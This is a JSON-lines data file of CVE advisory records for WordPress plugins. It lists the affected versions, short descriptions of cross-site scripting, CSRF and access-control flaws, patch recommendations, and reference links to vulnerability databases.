{"CVE_ID":"CVE-2023-0585","slug":"all-in-one-seo-pack","versionImpact":"4.2.9","description":"The All in One SEO Pack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Administrator role or above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L666\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L665\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L665\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L624\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L624\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L625\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-in-one-seo-pack\\\/tags\\\/4.2.9\\\/app\\\/Common\\\/Main\\\/Updates.php?v=2829340#L625\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2859011%40all-in-one-seo-pack%2Ftrunk&old=2847431%40all-in-one-seo-pack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db97180-9308-4891-9de9-acefe31d088f\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3db97180-9308-4891-9de9-acefe31d088f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2120","slug":"wp-responsive-thumbnail-slider","versionImpact":"1.1.9","description":"The Thumbnail carousel slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4bf4e12-5cbb-45bc-938e-62163baaa15d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4bf4e12-5cbb-45bc-938e-62163baaa15d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2813150%40wp-responsive-thumbnail-slider%2Ftags%2F1.1.9&new=2899786%40wp-responsive-thumbnail-slider%2Ftags%2F1.1.10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2813150%40wp-responsive-thumbnail-slider%2Ftags%2F1.1.9&new=2899786%40wp-responsive-thumbnail-slider%2Ftags%2F1.1.10\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4398","slug":"amministrazione-trasparente","versionImpact":"7.1","description":"The Amministrazione Trasparente plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including,  7.1. This is due to missing or incorrect nonce validation on the at_save_aturl_meta() function. This makes it possible for unauthenticated attackers to update meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6358fc29-5b09-481a-9040-a7890b61f419?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6358fc29-5b09-481a-9040-a7890b61f419?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548741%40amministrazione-trasparente&new=2548741%40amministrazione-trasparente&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548741%40amministrazione-trasparente&new=2548741%40amministrazione-trasparente&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9187","slug":"read-more","versionImpact":"1.1.8","description":"The Read more By Adam plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the deleteRm() function in all versions up to, and including, 1.1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete read more buttons.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ebc8d0d-04b6-49a0-96c1-7c6d930009d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ebc8d0d-04b6-49a0-96c1-7c6d930009d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/read-more\\\/trunk\\\/files\\\/RadMoreAjax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/read-more\\\/trunk\\\/files\\\/RadMoreAjax.php#L9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9388","slug":"black-widgets","versionImpact":"1.3.7","description":"The Black Widgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618c72b1-363b-41ad-939d-ab2a3b4d579c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618c72b1-363b-41ad-939d-ab2a3b4d579c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/black-widgets\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/black-widgets\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/black-widgets\\\/trunk\\\/includes\\\/class-bw.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/black-widgets\\\/trunk\\\/includes\\\/class-bw.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178366\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178366\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31441","slug":"wp-galleria","versionImpact":"1.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in S WordPress Galleria allows Reflected XSS. This issue affects WordPress Galleria: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-galleria\\\/vulnerability\\\/wordpress-wordpress-galleria-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-galleria\\\/vulnerability\\\/wordpress-wordpress-galleria-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12734","slug":"advance-post-prefix","versionImpact":"1.1.1","description":"The Advance Post Prefix WordPress plugin through 1.1.1, Advance Post Prefix WordPress plugin through 1.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/038b44dc-0495-4f56-ae7e-c78a265aa535\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/038b44dc-0495-4f56-ae7e-c78a265aa535\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5814","slug":"profiler-what-slowing-down","versionImpact":"1.0.0","description":"The Profiler \u2013 What Slowing Down Your WP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpsd_plugin_control() function in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to reactivate previously deactivated plugins after accessing the \"Profiler\" page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profiler-what-slowing-down\\\/trunk\\\/actions.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profiler-what-slowing-down\\\/trunk\\\/actions.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9213db60-c0c1-44a9-9b8c-621029c3a08f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9213db60-c0c1-44a9-9b8c-621029c3a08f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1029","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the regenerateSitemaps function. This makes it possible for unauthenticated attackers to regenerate Sitemaps via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764aec73-f291-4372-9dde-812ffaf025ed\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764aec73-f291-4372-9dde-812ffaf025ed\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2119","slug":"responsive-filterable-portfolio","versionImpact":"1.0.19","description":"The Responsive Filterable Portfolio plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.0.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67dfe0f-ac1c-4a78-bfc9-0cfd6c3040d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67dfe0f-ac1c-4a78-bfc9-0cfd6c3040d4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808922%40responsive-filterable-portfolio%2Ftags%2F1.0.19&new=2899431%40responsive-filterable-portfolio%2Ftags%2F1.0.20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808922%40responsive-filterable-portfolio%2Ftags%2F1.0.19&new=2899431%40responsive-filterable-portfolio%2Ftags%2F1.0.20\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4397","slug":"staff-directory-pro","versionImpact":"3.6","description":"The Staff Directory Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.6. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to save custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548539%40staff-directory-pro&new=2548539%40staff-directory-pro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548539%40staff-directory-pro&new=2548539%40staff-directory-pro&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5971447d-0634-49a5-91d0-c4f0c0825a86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5971447d-0634-49a5-91d0-c4f0c0825a86?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43269","slug":"wp-backitup","versionImpact":"1.50","description":"Cross-Site Request Forgery (CSRF) vulnerability in WPBackItUp Backup and Restore WordPress.This issue affects Backup and Restore WordPress: from n\/a through 1.50.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7489","slug":"mailchimp-wp","versionImpact":"2.5.6","description":"The Forms for Mailchimp by Optin Cat \u2013 Grow Your MailChimp List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form color parameters in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52f9db86-7fed-4b32-8384-3ceb300f9249?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52f9db86-7fed-4b32-8384-3ceb300f9249?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L166\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2078","slug":"blogbuzztime-for-wp","versionImpact":"1.1","description":"The BlogBuzzTime for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blogbuzztime-for-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blogbuzztime-for-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746e47f2-3fe3-439c-bd54-a9bba9c86271?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746e47f2-3fe3-439c-bd54-a9bba9c86271?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31848","slug":"adverts-click-tracker","versionImpact":"1.4","description":"Missing Authorization vulnerability in WPFactory WordPress Adverts Plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress Adverts Plugin: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/adverts-click-tracker\\\/vulnerability\\\/wordpress-wordpress-adverts-plugin-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/adverts-click-tracker\\\/vulnerability\\\/wordpress-wordpress-adverts-plugin-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12733","slug":"affiliateimportereb","versionImpact":"1.0.6","description":"The AffiliateImporterEb WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61be935e-ecb4-45be-8553-65877dd42569\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61be935e-ecb4-45be-8553-65877dd42569\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5925","slug":"bunnys-print-css","versionImpact":"0.95","description":"The Bunny\u2019s Print CSS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.95. This is due to missing or incorrect nonce validation on the pcss_options_subpanel() function. This makes it possible for unauthenticated attackers to update settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bunnys-print-css\\\/trunk\\\/print-css.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bunnys-print-css\\\/trunk\\\/print-css.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53282bec-cd47-4db4-8ffe-6647521c0d49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53282bec-cd47-4db4-8ffe-6647521c0d49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28975","slug":"alike","versionImpact":"3.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in redqteam Alike - WordPress Custom Post Comparison allows Reflected XSS. This issue affects Alike - WordPress Custom Post Comparison: from n\/a through 3.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/alike\\\/vulnerability\\\/wordpress-alike-wordpress-custom-post-comparison-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/alike\\\/vulnerability\\\/wordpress-alike-wordpress-custom-post-comparison-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1068","slug":"read-more-excerpt-link","versionImpact":"1.6.0","description":"The Download Read More Excerpt Link plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.0. This is due to missing or incorrect nonce validation on the read_more_excerpt_link_menu_options() function. This makes it possible for unauthenticated attackers to update he plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0359434b-9d88-4a40-8e9f-ec354c8de816\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0359434b-9d88-4a40-8e9f-ec354c8de816\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2871098\\\/read-more-excerpt-link\\\/trunk\\\/read-more-excerpt-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2871098\\\/read-more-excerpt-link\\\/trunk\\\/read-more-excerpt-link.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
